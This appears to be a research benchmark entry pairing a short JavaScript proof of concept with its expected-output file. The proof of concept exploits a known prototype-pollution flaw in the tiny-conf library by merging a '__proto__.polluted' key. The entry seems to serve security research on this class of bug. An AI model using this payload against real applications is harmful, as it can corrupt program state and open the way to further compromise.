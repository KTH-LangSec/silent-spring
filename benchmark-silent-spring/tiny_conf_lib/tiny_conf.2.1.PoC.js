//https://snyk.io/vuln/SNYK-JS-TINYCONF-598792
const tinyConf = require('tiny-conf'); 
let val = {prop: "yes"};
val.toString = () => "yes";
tinyConf.merge('__proto__.polluted', val); 
  