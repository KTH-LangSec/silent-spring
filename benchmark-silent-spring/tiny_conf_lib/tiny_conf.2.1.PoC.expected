node_modules/tiny-conf/tiny-conf.js:107:19